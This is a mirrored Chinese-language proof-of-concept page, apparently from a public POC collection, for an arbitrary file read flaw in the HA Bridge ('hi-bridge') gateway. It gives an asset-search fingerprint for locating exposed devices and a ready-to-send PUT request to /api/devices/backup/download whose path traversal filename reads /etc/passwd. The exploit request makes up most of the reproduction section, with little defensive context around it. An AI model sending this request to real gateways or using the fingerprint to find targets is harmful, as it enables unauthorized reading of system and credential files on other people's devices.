mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-12 11:06:19 +00:00
752 B
752 B
hi-bridge网关download存在文件读取漏洞
一、漏洞简介
hi-bridge网关download存在文件读取漏洞
二、影响版本
- hi-bridge网关
三、资产测绘
title="HA Bridge"
四、漏洞复现
PUT /api/devices/backup/download HTTP/1.1
Host:
User-Agent: Mozilla/5.0
{"filename":"../../../../etc/passwd"}
更新: 2024-05-23 12:38:07
原文: https://www.yuque.com/xiaokp7/ocvun2/aat3gchwm23g4rhd